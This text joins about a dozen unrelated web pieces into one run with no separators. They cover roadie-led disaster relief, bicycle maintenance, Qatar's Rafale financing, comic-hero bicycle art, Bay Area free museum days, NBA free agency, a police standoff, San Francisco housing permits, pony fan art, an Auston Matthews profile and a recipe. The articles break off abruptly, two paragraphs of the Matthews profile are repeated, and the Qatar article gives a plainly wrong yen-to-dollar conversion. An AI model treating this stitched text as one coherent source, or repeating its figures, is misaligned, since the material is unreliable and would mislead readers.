He picked up the phone and called his good friend and Rock-It owner David Bernstein, with whom he had collaborated on numerous rock tours. “I see you have an empty airplane,” he said. Just like a teenager asking to borrow his friend's car and pay for the gas, Hernandez asked to borrow his friend's plane. Except that in this case, the gas cost $50,000. To raise money for gas, Hernandez called his friend John Campion, CEO of APR Energy Group, which handles installation of temporary power grids worldwide and was doing business in Haiti. He said, “Hey, John, I've got an airplane, but I need some gas.” Campion's response: “How much and where do I send the check?” He then got Upstaging and ShowMotion trucking on board and procured medical supplies from project C.U.R.E, which collects surplus medical supplies from American hospitals.
The plane Hernandez and his team sent over, which was full of medical equipment, was the first civilian aircraft that got into Haiti. Ultimately they did four rotations from Florida to Haiti, moving $2 million worth of medical equipment and 48 doctors, nurses, and medical support staff directly to hospitals run by Partners in Health. His organization, which he named Just a Bunch of Roadies, got 120,000 pounds of food to Pakistan after that country saw crops devastated by flooding in 2010. They have also been working with Sting's One World Futbol Project to get durable soccer balls to disadvantaged communities around the world using slack space in their tour containers.
And now they are collaborating with Upstaging Transport Trucking, APR Energy, Rock-it Cargo, Project C.U.R.E. and Clinton's Global Initiative to direct aid donated by entertainment companies to the Philippines using the same methods of rapid mobilizing. At first they looked into the option of trucking material from various points in the United States to available aircraft and flying it to Cebu and Tacloban. “But because of the volumes of aid that has flown in to the disaster area,” said Hernandez, “We have shifted our moves to sea freight containers partnering with Project C.U.R.E. to help re-establish hospital infrastructures supplies, including large shipments of antibiotics. This will allow for a comprehensive door-to-door logistic based on long-term needs.”
How does a roadie make an impact on such a scale? By doing what the concert industry has been doing for years. “Disasters are just like a rock show,” Hernandez told me. “You need to establish communication lines, you establish power supplies, including electricity. Then from there you build the infrastructure, from there the lighting system, and boom, you have a city.”
Rock concerts descend upon a host site and then quickly disappear. Along the way, they face technical complexity, divergent regulations, multiple vendors, language barriers, and the certainty of unforeseen obstacles, all on a massive scale. And no matter what, the show must go on, on time, and without anyone getting hurt.
Touring professionals develop strong emotional connections to the places they visit, which makes them want to reach out and lend their skills when disaster strikes. When the band Linkin Park finished their tour of South Asia in 2004, they came home to horrifying images of the destruction caused by the Indian Ocean tsunami. They quickly organized a benefit concert and launched Music for Relief, which brings together musicians, touring professionals, and fans to provide disaster relief. “The hope,” told me Music for Relief's chief operating officer Whitney Showler, “is to bring the music and entertainment community together to create a bigger impact.”
When Typhoon Haiyan hit the Philippines, musicians, managers, roadies, and fans reached out to Music for Relief offering help. Linkin Park, 30 Seconds to Mars, Jerry Seinfeld, Celine Dion, Hall & Oats and other artists have donated tickets and experiences. Even fans have stepped up, donating their signed Linkin Park memorabilia. The money raised by these efforts goes to International Medical Corps. Those who want to provide hands on help are directed to All Hands Volunteers, an organization that mobilizes volunteers on the ground.
Roadies are eager to help, which is impressive given their grueling lifestyle. “People imagine that life on the road is fun and easy,” Showler told me, “but these men and women work so hard. They have rare and infrequent days off. Their work is very physical. Sometimes they don't have an actual bed to sleep in, they are sleeping on buses. So to find opportunities where they have a day off and then to get them to come help others is pretty remarkable. And they've done that.”
Roadies' skills and work ethic make them particularly effective at providing disaster relief. One of the strengths of the concert business is follow-through, a skill that Just a Bunch of Roadies applies to its international relief efforts. Roadies do not just drop off. They work until the first note plays, and, after the show is over, they keep working until every guitar pick is safely headed for the next stop on the tour. The same goes for disaster relief. “You have to ensure,” said Hernadez, “that assistance is delivered directly to caregivers, hospitals and relief workers, rather than being dropped off somewhere when it could be usurped by black marketers.” Like planning a show, disaster relief begins with the end goal: getting supplies to the hands of the people who need them. The job is not done when the fuel trucks leave their place of origin. It is done when there are no lines for food, gas, or medicine.
Another strength is the fierce camaraderie among touring professionals. “Our guys are pierced and tattooed and they're all wearing outrageous clothes,” said Carol Scott, an executive at the staging company TAIT. “But if push came to shove they'd probably all die for each other.” Their loyalty translates into no-questions-asked real-time help in the moment of crisis. “We have each other's backs,” said Henandez, “If somebody stumbles, then we pick him up.”
Which is why the roadies are always the first ones in and the last ones out.
For more about the intersection of rock n' roll and business follow me on the top of this page or on Twitter, Facebook, or Google.
A bicycle is an amazing machine. Easy to ride, but full of all sorts of moving parts that work together smoothly when everything is aligned, just so. As an active cyclist, I advocate for making friends with your local shop - they'll likely give you basic adjustments for free. But there's plenty of tune-ups you can do at home to keep things running smoothly, and save the trip.
So, as riding season seems to finally be poking its head in and cyclists of all types are getting prepped to ride regularly, here are five easy tune-ups you can do to get your bike ready for spring.
1. Check your tires and wheels. Tires are the thing that keeps you connected to the ground, so treat them well. Inspect your tires for any dryness or rot, and make sure there's plenty of treads still left. Look at them head-on, and note the amount of tread left...the curvature and shape of the tire. Depending on your tires and terrain, you should be able to get anywhere from 1000 to 2,500 miles from a set. If things look a little bare, ride down to your shop and have a mechanic assess whether or when you need new tires.
If you're good to go, fill 'em up! Ideally, you should do this anytime before a ride, so you don't get as many flats. Just look on the side of your tire, and note the recommended PSI or number of bars to inflate. For road and street riding (as in, not mountain biking), fill 'em all the way up. I like to ride at just under 100. Investing in a good floor pump will save you tons of time, keeping the mini-pump for en route refills.
Lastly, inspect your wheelset and make sure everything is spinning nice and true. Check that all your spokes are intact. If your wheels are warped or you need a spoke replaced, have them fixed immediately. It'll save you many headaches later. Fixing spokes can be fun, but for a casual rider, it might be worth paying your shop $15 for the job.
2. Square Up Your Frame, Handlebars, and Saddle. Straddle your bike, standing on the ground, and confirm that your handlebars are at 90° to your wheel. Turn the handlebars and check to see that full turns to the right and the left follow perfectly. Make any adjustments by loosening your stem (the part that connects your frame to your handlebars), aligning it, and then tightening it back on angle. Don't skip this step - it's super important for safe riding, and you'll be surprised by how much things can move from ride to ride.
Lastly, check your saddle (seat) by sitting on it. You don't want any shock absorption here: correct any front-to-back, side-to-side, or up-and-down movement by tightening the allen bolts. Trust me - this will help prevent any soreness in your tailbone or lower back.
3. Inspect Your Brakes. With your bike at rest, pull on the brake levers. You don't want them to go all the way back (or down) to engage the wheel. While this can be a matter of preference, you want to stay in the middle zone, between 40 and 60% of their possible span, for safe breaking. So, tighten up the cables on the breaks to about 50%, then fine tune this on a ride.
Next, check your brake pads and make sure there's still plenty of pad left. Confirm that your brake pads are stopping the wheel (the metal part), not the tire. If it needs adjusted, use a metric allen wrench to move the brake pad up or down.
Lastly, using just your fingers, confirm that the brake pads are compressing evenly on both sides of the wheel. This is also something to check before each ride, so that your not running either side of the wheel against the brake, making for unnecessary effort for you and wear on your bike.
4. Clean All Moving Parts [Especially Your Cassette] and Lube Your Chain. In order for your bike to run smoothly, you want as little resistance as possible. Use and old toothbrush or a special gear brush to remove any build up dirt, grime, leaves, and excess lube in your gear cassette. (Fixed gear bikes will only have one, obviously). Use a rag or chain cleaner to remove any crud or rust from your chain by running your pedals backwards.
If your chain has more than 2,000 miles on it, you'll want to replace it. It's akin getting your oil changed in your car, so don't skimp. If you're good to go, run the chain backwards, and drip a small, steady stream of lube (I like this teflon-based option) for one rotation only. As you ride more, you'll want to re-lube your chain every 100 miles. Don't use WD-40 for this, please. (Sorry, dad).
5. Learn How to Change a Tire on the Road. Flats are the worst, and while you can prevent them by filling up before each ride, sometimes, you'll lose a tube in the middle of the ride... when you're nowhere near your local shop or toolbox. For safety, I recommend that anyone who rides a bike should have both the knowledge and the equipment to replace a tire tube in the middle of nowhere...cause eventually, it's gonna happen.
You'll need: two tire levers, a mini pump and/or Co2 cartridge, and a spare tube (or two). That's it, and they'll fit into any saddle bag. Most bike shops will offer free hands-on courses for this, but here's a quick video that shows you how:
Seriously...I mean it. Don't get stranded, don't have to call for someone for help, and don't pay somebody $20 to fix it. It's totally doable, safe, and you'll feel like a master. The hardest part is seating and unseating the tire. And, like riding the bike itself, once you've done it once, you'll never forget how.
This ManMade post was originally published in March 2013. We're sharing again because it's bike season!
Tagged:
PARIS — Japanese banks drew on close commercial ties to Qatar when they lent funds that helped Doha pay last year's down payment for Rafale fighter jets and missiles worth €6.3 billion ($6.8 billion), financial specialists said.
A bank loan to Qatar, a nation rich in oil and gas reserves, signaled an economic shift for the Arabian Gulf nation and its strong business ties to Japanese lenders and construction companies.
"Qatar can borrow relatively cheaply on the international bank market as there is huge collateral with the Qatar sovereign fund," said Stéphane Audrand of the consultancy Sylmaris. There is also long-term collateral with Qatar's export energy contracts.
The sovereign fund is valued at $256 billion, according to the Sovereign Wealth Fund Institute, which specializes in institutional investors.
"The relations between Qatar and Japan are unique, focused on construction and LNG," said Sash Tusa, analyst with equity research firm Agency Partners.
The two countries have shared interests, with Japanese companies working on construction projects for the 2022 World Cup soccer tournament in Qatar, which supplies liquefied natural gas to Japan, he said.
Qatar paid the deposit for the Rafale deal Dec. 16, finally putting into effect contracts signed eight months earlier on May 4. A down payment is usually 15 percent of the total amount.
The order included 24 Dassault Aviation fighters and 12 options, and guided weapons from MBDA and Safran's Sagem. The French Air Force will also train Qatari pilots and maintenance personnel.
× Fear of missing out? Fear no longer. Be the first to hear about breaking news, as it happens. You'll get alerts delivered directly to your inbox each time something noteworthy happens in the Military community. Thanks for signing up. By giving us your email, you are opting in to our Newsletter: Sign up for our Early Bird Brief
Japanese banks lent Doha funds for the down payment, said a French executive and a financial specialist who declined to be identified.
Qatar expects its economy this year to fall into a $12.8 billion budgetary deficit, representing 6 percent of gross domestic product, according to the CIA World Factbook. "Low oil prices have dampened the outlook," the report said.
That budgetary upset comes after several years of strong growth, which delivered an estimated 2015 average income of $145,000, the world's highest average income, according to the report. Japan is Qatar's leading trade partner, accounting for 25.3 percent of exports, followed by South Korea's 18.8 percent and India's 12.7 percent.
The Qatari bank loan reflects a steep fall in oil prices. The benchmark Brent crude oil hit a 12-year low of $27.10 on Jan. 20, Reuters reported. The oil price has since risen but that firmer path was partly due to talks by energy producers to freeze production in a bid to prop up prices.
Japanese banks have major business interests in Qatar, which is building transportation and infrastructure projects for the World Cup.
A consortium led by Mitsubishi Heavy Industries won an order estimated at some ¥400 billion (US $61.5 billion) to build a subway in time for the soccer tournament, Japan Times reported Feb. 21. Consortium partner Thales will supply the signaling system, while Hitachi will handle train maintenance.
Last year, Thales also won a security contract for Qatar Hamad port, a large commercial facility which will also be the site for a naval base.
In early January, Qatar closed a $5.5 billion syndicated loan, arranged by six banks including three Japanese lead lenders: Bank of Tokyo-Mitsubishi UFJ, Mizuho, and Sumitomo Mitsui Banking Corp, Reuters reported. Qatar National Bank, Deutsche Bank and Barclays helped arrange the five-year loan, expected to carry a margin of 90 basis points over London Interbank Offered Rate.
A basis point is 1/100 of a percentage point.
Qatar had previously hoped to raise $10 billion with a smaller margin of some 80 basis points, International Financing Review reported.
"The expected slowdown in the Qatari economy is likely to be seen as short-term risk, unlikely to deter Japanese bank lenders, which hold large amounts of cash and are looking for borrowers," Audrand said.
The Japanese banks can offer low-cost financing as they draw on ample funds, with the Bank of Japan injecting cash in a quantitative easing policy in a bid to boost the sagging economy.
Japanese banks have shown some public concern on lending on weapons, as indicated in a ban by Bank of Tokyo-Mitsubishi UFJ on lending to builders of cluster bombs, but there is greater pressure on European lenders.
"European banks are under tight regulatory control on credit risk and deeper scrutiny under corporate social responsibility," Audrand said.
That may have made it hard for French banks to lend to Qatar for the Rafale as there is geopolitical risk, with tension rising with Iran and the Islamic State, he said.
US banks were unlikely to have funded the Qatari order as that would likely displease Boeing, a competitor to Dassault in the fighter market, the financial specialist said.
Qatar seeks acquisition of 73 F-15E Strike Eagle fighters, with 36 in a first tranche, US Senate Foreign Relations Chairman Bob Corker has said. The White House is expected to decide soon whether that deal will go ahead, as the Defense and State Department support for the request.
Doha announced in June a planned order for four Boeing C-17 transports.
Qatar is seen as a large arms market, announcing in 2014 a plan to buy two Airbus A330 multirole tanker transport aircraft and 22 NH90 helicopters.
France hopes to sell a planned DCNS air defense frigate, while Nexter has pitched the Véhicule Blindé de Combat d'Infanterie (VBCI), an infantry fighting vehicle, to Qatar, which is reportedly looking for 200 to 600 units.
The Qatari deal with France includes MBDA Mica air-to-air and Meteor long-range, air-to-air missiles, Scalp cruise missiles, and Sagem's armement air-sol modulaire (AASM), a powered smart bomb, French defense officials said.
Customized Superhero Bicycles Rock the Town
Almost all of us have grown up reading comics that depict the heroics of superheroes and other characters. Some can fly in the air, some can scale skyscrapers and others can metamorphose into other beings.
However, not many of us would dream our favourite superheroes riding bicycles! Mike Joos, a talented illustrator has brought the funny side of these superheroes by creating illustrations in which each of the famous superheroes ride customized bicycles. What is funnier is that each of the bicycles is somehow connected to the character that sits on it.
The one that Spider-Man rides seems to be made of the luscious liquid that spiders secrete. Or could it be possible that the cycle is made of steel inspired from the steel structures that he scales?
This Cookie Monster's riding a cycle that has wheels made of chocochips. Now that would make me want to eat the vehicle and the passenger at the same time.
Mr. T is one of the most famous American actors, known for his roles in Rocky III and “I Pity the Fool”. Now, the artist has created a bicycle for him with gold chain wheels, which would surely make him an easy victim for thugs. Now, I pity the fool!
Thor was recently released as a movie starring Chris Hemsworth. This timeless Marvels Comics character gets to ride a cycle which is made of hammers in place of spokes.
Aquaman's bicycle gets wheels that are made of fish! Now we would all love to see his bicycle wiggle around the streets, wouldn't we?
The craziest so far has to be this weird cycle designed for C3PO from Star Wars, who gets to ride a bicycle which comes with R2D2 and R2D1 wheels.
Thomas Jefferson was a prominent President of the United States of America during its initial years, and we know him well as his face is usually printed on the nickel. Thus, his bicycle gets wheels with nickels!
Edward Morgan Blake or The Comedian from ‘Watchmen' is known for his ultra-macho appeal. However, these smiley wheels on his bicycle make him thump his chest a little less.
Superman's red bicycle sure suits him, and seems to be customized the way he wants. However, the seat must be so tiny, that it must hurt Superman a lot, where it shouldn't.
You can also take a look at a couple of other bicycles inspired by other comic characters. It sure must be fun, if these cycles were designed in real! If you wanted a look at some real bicycle concepts and designs, you could take a look at the 12 Bicycle Designs we had featured earlier. The Foldable Bicycle Design and the Riderless Bike are pretty interesting too!
Via: My Modern Met
Love Museums? Check Out These Free Museum Days. December 3-11, 2016
If you need a break from digging through boxes at sample sales check out these upcoming free museum days:
The Walt Disney Family Museum celebrates Walt Disney's birthday with its annual free day. This is the only free day all year so mark your calendar.
Visit the eco-friendly California Academy of Sciences admission free, no strings attached,no fine print.
Anyone with a Bank of America (or Merrill Lynch) credit or debit card can visit participating museums admission free both Saturday and Sunday. One hundred fifty cultural institutions across the United States are in the program including nine in the wider Bay Area.
This week has free admission days at TEN top Bay Area museums.
Bonus: many of the museums are family friendly and some will even appeal to your eye rolling tween.
Free Museum Days:
WALT DISNEY FAMILY MUSEUM
The Walt Disney Family Museum is free Monday, December 5, 2016.
104 Montgomery Street The Presidio, San Francisco 94129 MAP
In honor of Walt Disney's birthday the public is invited to enjoy The Walt Disney Family Museum admission free. This is the only free day all year. Check out artifacts including the first known drawing of Mickey Mouse (and all the earliest merchandise), a cabinet filled with Disney's Oscar awards, memorabilia from the New York World's Fair, the real train Walt built in his backyard that would later be the model for the Disneyland Railroad, and much more. I ♥ the Walt Disney Family Museum.
Click here for 10 tips for the Walt Disney Family Museum free day.
Bonus: December 5th also marks the museum's first daily lighting ceremony in which one lucky family will illuminate holiday decorations on its newest immersive installation, Home for the Holidays at Carolwood. The installation celebrates Walt's family and love of trains, most notably featuring an elaborate three-dimensional model of the Disney Family home on Carolwood Drive in Los Angeles.
________________________________________________________________________________________________
CALIFORNIA ACADEMY OF SCIENCES
California Academy of Sciences Sunday is free Sunday, December 11, 2016
55 Music Concourse Drive, San Francisco MAP
Four times a year, the eco-friendly California Academy of Sciences is admission free, no strings attached. The last free day for 2016 is Sunday, December 11, 2016.
Enjoy the aquarium, the planetarium, the four-story rain forest, the African Hall (with penguins), swamp exhibit (with rare white alligator), T Rex and blue whale skeletons and the beloved Earthquake Exhibit. Don't forget to make your way up to the “green” roof covered with local plants and a sweet observation deck.
Click here for 8 tips for the California Academy of Sciences free day.
________________________________________________________________________________________________
BANK OF AMERICA MUSEUMS ON US
Free museum days at 9 Bay Area museums on December 3 + 4, 2016
Aptly named “Museums On Us”, anyone with a Bank of America or Merrill Lynch credit or debit card can visit participating museums admission free the first full weekend of every month. One hundred fifty cultural institutions across the United States are in the program including nine in the wider Bay Area.
Fine Print: Bank of America Museums On Us allows each cardholder one free admission. You must show your Bank of America or Merrill Lynch card and photo identification.
More Fine Print: Special exhibitions and ticketed shows are not included in the Bank of America Museums On Us free offer but you still save the cost of admission making this a great deal.
Click here for museums participating in Bank of America Museums on Us and tips.
________________________________________________________________________________________________
FIRST TUESDAY FREE MUSEUM:
Conservatory of Flowers is free December 6, 2016
Golden Gate Park
100 John F. Kennedy Drive
San Francisco, CA 94118
Click here for current exhibits.
The Conservatory of Flowers is the oldest wood and glass conservatory in North America. This spectacular greenhouse/botanical garden houses rare and exotic plants and has varied and interesting special exhibits focusing on plants.
Contemporary Jewish Museum is free December 6, 2016
736 Mission Street
San Francisco, CA 94103
The Contemporary Jewish Museum highlights exhibitions and programs that explore contemporary perspectives on Jewish culture, history, art, and ideas. Click for current exhibits and events.
Bonus: Mark your calendar — the CJM is open on Christmas day, December 25th and admission is free!
Golden Gate Park
50 Hagiwara Tea Garden Drive
San Francisco, CA 94118
NOTE: Entry to the museum is free but special exhibition fees may apply.
Click for current exhibits and programs.
The de Young Museum houses an impressive collection of American art, international textile arts and costumes, and art of the ancient Americas, Oceania and Africa. The museum has an intriguing permanent collection and the special exhibits are not to be missed.
Lincoln Park
34th Avenue & Clement Street
San Francisco, CA 9476121
Tel: (415) 863-3330
NOTE: Entry to the museum is free but special exhibition fees may apply.
The Legion of Honor displays an impressive collection of 4,000 years of ancient and European decorative arts and paintings, and one of the largest collections of prints and drawings in the country.
Museum of Craft and Design is free December 6, 2016
2569 3rd Street
San Francisco, CA 94107
Hours: Tuesday 11 – 6
The Museum of Craft and Design has changing exhibits showcasing innovative contemporary work in craft and design. Be inspired.
Click here for current exhibits.
Yerba Buena Center For the Arts is free December 6, 2016
701 Mission Street
San Francisco, CA 94102
The YBCA is a unique fusion of art, innovation and ideas in a social environment. Its changing exhibits bring together artists, inventors, producers, thinkers, and the community for the purpose of propelling short and long-term social change.
________________________________________________________________________________________________
FIRST WEDNESDAY FREE:
East Fort Baker
557 McReynolds Road
Sausalito, CA 94965 DIRECTIONS
Hours: 9 a.m. to 4 p.m.
Bay Area Discovery Museum is a hands-on interactive children's museum located inside the Golden Gate National Recreation Area. Think non-commercial toddler “Disneyland.”
The GLBT History Museum is free December 7, 2016
4127 18th Street
San Francisco, CA 94114 MAP
Phone : (415) 621-1107
Hours: 11 am to 7 pm
The GLBT History Museum is the first full-scale, stand-alone museum of its kind in the country. The museum celebrates 100 years of the city's queer history through dynamic and enlightening exhibitions and programming. Click here for current events and exhibits.
________________________________________________________________________________________________
FIRST SUNDAY FREE:
200 Larkin Street San Francisco, CA
The Asian Art Museum is one of the largest museums in the Western world devoted exclusively to Asian Art, with over 17,000 artworks spanning 6,000 years of history.
1000 Oak Street Oakland, CA 94607
The Oakland Museum of California brings together collections of art, history and natural science to tell the story of California and its people from many angles. View the museum's collection including: 70,000 examples of California art and design, created from the mid-1800s to the present; 1.8 million items representing California's history and cultures from the era before Europeans arrived, to the 21st century; and 25,000 square feet dedicated to California's unique and diverse climate, geology, ecosystems and wildlife.
BTW, these free days are not the only way to gain free museum entry. As a self-proclaimed museum nerd (and deal tracker aka cheap skate) I have written several posts covering museums that are always free and museums deals. Check these old posts out and save!
Deals We Are Tracking:
© 2016 Deal Tracker SF. All rights reserved.
Don't miss another deal – subscribe to Deal Tracker SF. It's FREE. And no worries – we would never share your info or spam you and you can opt out at any time.
The Chicago Bulls still have unrestricted free agents Michael Redd and Gerald Green on their radar even after reportedly signing Kirk Hinrich this weekend, as Mike McGraw of the Daily Herald reports. Assuming that the Bulls sign Hinrich to the mini mid level exception, they'll be hamstrung financially from adding to their roster from here, though:
If Hinrich got mini mid-level, then Bulls can only sign players to minimum salaries or make trades. Michael Redd & Gerald Green on radar. — Mike McGraw (@McGrawDHBulls) July 8, 2012
Even after adding Hinrich, the Bulls could still presumably use some help on the wings. It's unclear whether they'll bring back Kyle Korver and/or Ronnie Brewer for next season, but someone like Redd or Green would presumably qualify as a replacement.
Like Korver, Redd has made his name in the NBA with lights-out shooting, but the 32-year-old has played in just 112 games over the past four years due to a variety of injuries. The Bulls presumably hope that he can re-capture some of his old magic; before the injuries, Redd averaged 24.3 points per game over a four-year span as the Milwaukee Bucks' star player.
Green has had a much different story, looking like one of the league's biggest busts before emerging with the New Jersey Nets last season. After being out of the NBA for two years, Green played in 31 games for the Nets, averaging 12.9 points per game and 3.5 rebounds per game. At the age of 26, there's still some intriguing upside here.
For more, stick with SB Nation Chicago. For more on the Bulls, head over to Blog a Bull. For additional news, notes and analysis from around the NBA, visit SB Nation's NBA news hub.
A A
ARLINGTON, Wash. - An alleged gunman is dead after a SWAT team and other police officers came under fire Sunday from one or more shooters during a tense armed standoff in a rural area outside of Arlington.
One suspect was later found shot to death by police and officers are still searching the area to make sure a second shooter wasn't involved and still at large. A weapon was found on the gunman's body and investigators haven't said if he died from police fire.
The drama began at about 1:30 p.m. when a 26-year-old man who lives in the area thought he heard gunshots or fireworks. He hustled his kids inside the house then went to investigate with his father.
The father and son heard another bullet whistle through the branches of a nearby tree, then the son realized he had been shot in the calf. They ran home and called 911.
Deputies responded to the scene, and then they also came under fire. One patrol car was reportedly hit, but no officers were injured.
A SWAT team soon arrived at the scene, about a mile off Highway 530 near Jim Creek Road, and SWAT team officers reported multiple gunshot hits on their armored vehicle.
Police units reportedly then came under fire from different types of weapons, including a high-powered rifle, leading them to believe that there could be more than one shooter.
As the gun battle stretched through most of the afternoon, more armored vehicles were requested from other jurisdictions as far away as Seattle and Whatcom County as a police helicopter circled the scene.
Some residents in the area have been evacuated or warned not to leave their homes. A few on the edge of the scene were allowed back in late Sunday night but others closer to where the gunman was found were still told to stay away.
At the height of the standoff, scanner reports from the scene sounded like a war zone, with multiple police and sheriff units coordinating and positioning themselves strategically.
Eventually police were able to pinpoint the location of a suspected shooter, and later found his body.
The 26-year-old man who was shot in the calf at the beginning of the incident was taken to Cascade Hospital in Arlington, where he was undergoing treatment.
Between 2007 and 2014, San Francisco granted permits to 16,449 new housing units, just 53 percent of the 31,193 total it needed to keep up with population growth, as projected by the Association of Bay Area Governments (ABAG). The city's dismal performance just about guarantees more graphs (like this one) summing up our equally dismal building record in the years to come. Meanwhile, Oakland met just 26 percent of its identified need, permitting just 3,852 units out of a needed 14,629. ABAG tallied up the results from the entire Bay Area in one handy but depressing spreadsheet, reported the San Francisco Business Times.
The majority of new housing permits issued in San Francisco between 2007 and 2014 were for above-moderate-income units. Before we go there, though, let's get some wonky stuff out of the way: Those 31,193 units identified as San Francisco's goal came from the Regional Housing Need Allocation, which identifies the housing need for the entire Bay Area. ABAG and the Metropolitan Transportation Commission then figure out how to distribute the total among local jurisdictions. This process adds a political element to what might look from the outside like a purely numbers game based on population growth, demand, and other concepts from math. But cities can try to negotiate their numbers down, for instance. So when cities don't make their goal, it's doubly depressing, because the goalpost was not necessarily determined wholly by reality to begin with.
As the Business Times notes, the Bay Area permitted about half the units it aimed to produce (an interactive version of the graphic above is this way). On the local level, a few exceptions stand out: Milpitas permitted more than twice the units it set out to, issuing 6,310 permits (of the 2,487 needed). Sunnyvale (86 percent), Redwood City (85 percent), and Dublin (79 percent) did well too, relatively speaking.
The picture looks still more bleak when you break down housing permits by income level. San Francisco is very good at producing above-moderate income housing, and middling at producing very-low-income housing, but pretty much abysmal at the rest. Very-low-income housing (covering households between 0 and 50 percent of area median income, or AMI) reached 57 percent of the goal, while above-moderate income (above 120 percent AMI) got 86 percent of its target units permitted. The middle, meanwhile, is lagging far behind. Moderate-income housing (80–120 percent AMI) fared the worst: Just 16 percent of needed units were permitted (1,075 out of 6,754). More moderate low-income housing (50–80 percent AMI) fared only slightly better, reaching only 19 percent of the goal, with 1,031 out of 5,535 units permitted.
Using a different calculation, SF Planning paints a rosier picture with their own data. Whereas ABAG's spreadsheet compares the numbers of permits issued between 2007 and 2014 with the target goals for each city, SF Planning tallied up the number of units built in the same period, and added in all the units entitled (but not built) as of the third quarter of 2014. By that standard, SF's proportion of units both built and entitled meets 108.1 percent of ABAG's goal. But those income breakdowns still hold: Above-moderate-income units reached 202.2 percent of their goal, trailed by moderate (30.4 percent) and low income (55.7 percent).
· Did your city fail the Bay Area's housing supply test? Probably [SF Business Times]
· SF's Population Is Growing Way Faster Than Its Housing Stock [Curbed SF]
· Bay Area Progress in Meeting 2007-2014 Regional Housing Need Allocation (PDF) [ABAG]
· Bay Area Housing Prices Are Being Driven Up By Very Low Supply, Says Math [Curbed SF]
· Residential Pipeline [SF Planning]
Sky Strike, as I like to call him
The moment I saw Dash's daddy in that flashback from the "Games Ponies Play" episode, I HAD to draw him....And then I started toying around with Rainbow's mama and immediately decided she would HAVE to be Firefly from G1.So that settled it. And then I made this.I like to think of Rainbow as nearly as Firefly in every way, personality wise (which she already is) -- the only difference is Firefly's a little more comfortable in her own horseshoes. She is bold and rebellious and doesn't give a crap what others think of her. Before Rainbow took the title, she was considered the best flier in Equestria and could have easily been a Wonderbolt. But her distaste for rules and restrictions blew that opportunity away. She knows she's the best and doesn't feel like she has to be part of a flying team to prove it. She just prefers showing off her skills in the company of her loved ones, giving her all the time in the world to train her little Rainbow in all her techniques! We all know how heartened Rainbow is on "looking cool" to others, so she doesn't always understand her mother in that respect -- why she would pass up the opportunity to be a Wonderbolt is BEYOND HER! But, that gives them more time to spend together. She supports her daughter in all her endeavors and knows exactly when to give her a push in the rare times when Rainbow finds herself nervous of judgement.As for Dash's daddy --his name on MLP wiki is Bifröst -- he's a quiet guy and doesn't like to draw too much attention to himself. The poor guy found himself inthe pickle when he realized he had the biggest, most adorkable crush on the untameable Firefly by the time he graduated from Flight school! Lucky for him, Firefly liked his reserved self, his dry jokes, and stability. Their courtship was short.Sky Strike works at the Weather Factory in Cloudsdale. He's a pretty good flier and can even beat Firefly in a race on a good day! He loves his daughter with all his heart, but is seen as a little too overprotective in Firefly's eyes. She often has to coax him into just letting Dash be herself, and remind him that getting a scrape or two builds good character. I like to think of him as a little like Marlin from. He's not "suffocating" in his worrying, just a tad annoying. But Rainbow loves him just as much as he does her, and finds it sometimes easier to confide in him when in need of advice. Firefly's advice is almost always "fuck it, who cares?", and that isn't always helpful, believe it or not.So it's Sky Strike that fills the void by being as understanding and encouraging as Dash needs during those puzzling situations.Woo, look at all that writin'! Might as well quit while I got nothin' more to say at the moment. Anyway, enjoy the Dash Family!Image (c) ~ Graystripe64 MLP:FiM and characters (c) , Hasbro, DHX, Hub
Matthews was the first United States-born player to be chosen No. 1 since the Chicago Blackhawks took Patrick Kane with the first pick in the 2007 NHL Draft. While growing up, he idolized players such Shane Doan and Daniel Briere, members of the Phoenix/Arizona Coyotes, a franchise that relocated in 1996 from Winnipeg. Matthews was an all-around athlete who chose to focus on hockey as an adolescent, and he excelled at every level of the game on his unique path to the NHL.
Matthews is the NHL's Sun Belt growth come to spectacular life. Who would have thought a decade or so ago that a player raised in Scottsdale, Arizona, would be the No. 1 pick in the 2016 NHL Draft -- and a potential franchise player for the Toronto Maple Leafs?
Matthews is the NHL's Sun Belt growth come to spectacular life. Who would have thought a decade or so ago that a player raised in Scottsdale, Arizona, would be the No. 1 pick in the 2016 NHL Draft -- and a potential franchise player for the Toronto Maple Leafs?
Matthews was the first United States-born player to be chosen No. 1 since the Chicago Blackhawks took Patrick Kane with the first pick in the 2007 NHL Draft. While growing up, he idolized players such Shane Doan and Daniel Briere, members of the Phoenix/Arizona Coyotes, a franchise that relocated in 1996 from Winnipeg. Matthews was an all-around athlete who chose to focus on hockey as an adolescent, and he excelled at every level of the game on his unique path to the NHL.
With USA Hockey's National Team Development Program in 2014-15, Matthews set United States Under-18 team records for a single season with 55 goals and 117 points (surpassing Kane's 52 goals and 102 points in 2005-06). The performance was a springboard not to major junior or college hockey, but to a one-and-done NHL prep season in Switzerland.
Playing in National League A, the top Swiss pro league, the 18-year-old center had 24 goals (fourth in the league) and 46 points (10th) in 36 games with Zurich in 2015-16. He played for the United States at the 2016 IIHF Junior World Championship, where he tied for the tournament lead with seven goals and helped the U.S. win a bronze medal, and at the IIHF 2016 World Championship, where he led the U.S. with six goals and tied for the lead in points with nine.
Marc Crawford, Matthews' coach with Zurich and a 15-year veteran behind NHL benches, likened him to Joe Sakic, the Hockey Hall of Fame center for the Colorado Avalanche. Crawford said Matthews, who possesses a deadly wrist shot, might be the best puck-handling center he has seen.
Matthews had a record-setting NHL debut on Oct. 13, 2016, when he scored four goals, becoming the first player in the League's modern era to do so. He led all rookies in goals (40), points (69) and shots on goal (279) in 2016-17 to win the Calder Trophy, awarded to the NHL's rookie of the year. He also helped the Maple Leafs advance to the Stanley Cup Playoffs for the second time since 2004.
Injuries limited Matthews to 62 games in 2017-18, but he finished with 63 points (34 goals, 29 assists) and helped the Maple Leafs return to the playoffs.
NOTES & TRANSACTIONS
Bowls seem to be all the rage right now. Nourish bowls, Buddha bowls…you name it. They are everywhere. I don't know that there is any set “recipe” for these bowls, but I happen to love all vegetable bowls like this Roasted Nourish Bowl.
You could add some protein in the form of chickpeas, healthy fat like avocado and grains, such as barley or farro. Today we used acorn squash, radishes, fresh spinach, broccoli, cauliflower, onions, beets and brussel sprouts.
Take a look at the center of this bowl. I saw a similar recipe for this Cranberry Horseradish Cream and just had to try it! I am in love. Seriously, it was THAT good. Unexpectedly good.
There is the sweet and sour from the cranberries, heat from the horseradish and the coolness of the vegan sour cream. You can adjust the horseradish to your personal taste. I know it sounds crazy, but trust me on this one. It's definitely worth trying. So yummy!!!
